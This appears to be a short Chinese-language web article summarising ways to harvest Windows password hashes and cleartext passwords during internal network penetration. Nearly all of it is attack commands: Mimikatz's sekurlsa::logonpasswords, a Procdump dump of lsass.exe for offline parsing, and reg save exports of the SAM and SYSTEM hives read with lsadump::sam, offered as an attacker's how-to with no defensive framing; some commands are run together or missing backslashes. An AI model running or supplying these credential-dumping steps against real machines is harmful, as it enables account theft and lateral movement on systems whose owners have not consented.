內(nèi)網(wǎng)滲透—獲取Windows內(nèi)Hash密碼方法總結(jié)
1、直接讀取
Mimikatz讀取明文密碼和hash時(shí)需要管理員權(quán)限。
privilege::debug //提升至debug權(quán)限
sekurlsa::logonpasswords //抓取密碼
2、Procdump+Mimikatz離線讀取lsass.dmp文件
Procdump是微軟官方發(fā)布的工具,可以用來(lái)將目標(biāo)lsass文件導(dǎo)出。先在目標(biāo)機(jī)器上上傳Procdump,導(dǎo)出lsass.dmp
procdump64.exe-accepteula-ma
lsass.exe lsass.dmp
將目標(biāo)機(jī)上的lsass.dmp下載到本地后,執(zhí)行Mimikatz導(dǎo)出lsass.dmp里面的密碼和hash:
sekurlsa::minidump 目錄lsass.dmp //將導(dǎo)出的lsass.dmp載入到Mimikatz中
sekurlsa::logonpasswords full //獲取密碼
3、通過(guò)SAM和System文件抓取密碼和Hash
首先利用注冊(cè)表命令將目標(biāo)機(jī)的sam或者system文件導(dǎo)出
reg save hklmsam sam.hive
reg save hklmsystem system.hive
然后將目標(biāo)機(jī)上的sam.hive和system.hive下載到本地,利用Mimikatz讀取sam和system文件獲取NTLMHash:
token::elevate
lsadump::sam

發(fā)表評(píng)論
請(qǐng)輸入評(píng)論內(nèi)容...
請(qǐng)輸入評(píng)論/評(píng)論長(zhǎng)度6~500個(gè)字
圖片新聞
最新活動(dòng)更多
-
免費(fèi)參會(huì)立即報(bào)名>> 7月30日- 8月1日 2025全數(shù)會(huì)工業(yè)芯片與傳感儀表展
-
精彩回顧立即查看>> 【線下會(huì)議】OFweek 2024(第九屆)物聯(lián)網(wǎng)產(chǎn)業(yè)大會(huì)
-
精彩回顧立即查看>> 松下新能源中國(guó)布局:鋰一次電池新品介紹
-
精彩回顧立即查看>> 2024 智能家居出海論壇
-
精彩回顧立即查看>> 2024中國(guó)國(guó)際工業(yè)博覽會(huì)維科網(wǎng)·激光VIP企業(yè)展臺(tái)直播
-
精彩回顧立即查看>> 【產(chǎn)品試用】RSE30/60在線紅外熱像儀免費(fèi)試用
編輯推薦